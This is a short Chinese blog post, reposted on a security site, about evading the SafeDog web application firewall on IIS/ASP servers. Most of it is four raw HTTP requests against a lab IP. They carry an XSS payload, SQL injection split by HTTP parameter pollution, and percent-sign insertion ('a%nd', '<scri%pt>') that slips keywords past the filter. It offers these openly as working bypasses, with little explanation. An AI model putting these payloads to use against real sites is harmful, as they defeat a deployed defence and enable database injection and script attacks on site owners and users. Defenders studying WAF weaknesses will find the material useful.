安全狗绕过之注射和跨站

暗月博客 2019年11月21日18:30:50评论344 views字数 577阅读1分55秒阅读模式
摘要

只要清楚安全狗的数据流是

就知道可能绕过 的方式了

绕过 了吧,呵呵

只要清楚安全狗的数据流是

network->iis->safedog->asp.dll

就知道可能绕过的方式了

GET /1.asp?a=1<img%20src='#'%20onerror=alert() HTTP/1.1  Host: 192.168.199.134  Connection: keep-alive  Content-Length: 7

绕过了吧,呵呵

GET /1.asp?a=1%20and/*&a=*/1=1 HTTP/1.1  Host: 192.168.199.134  Connection: keep-alive  Content-Length: 7

绕过了吧 呵呵

再来POST基本没什么悬念

POST /1.asp HTTP/1.1  Host: 192.168.199.134  Content-Type: application/x-www-form-urlencoded  Connection: keep-alive  Content-Length: 20    a=123%20a%nd%201=1

同理跨站

POST /1.asp HTTP/1.1  Host: 192.168.199.134  Content-Type: application/x-www-form-urlencoded  Connection: keep-alive  Content-Length: 20    a=<scri%pt>alert()</scri%pt>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日18:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安全狗绕过之注射和跨站https://cn-sec.com/archives/71219.html

发表评论

匿名网友 填写信息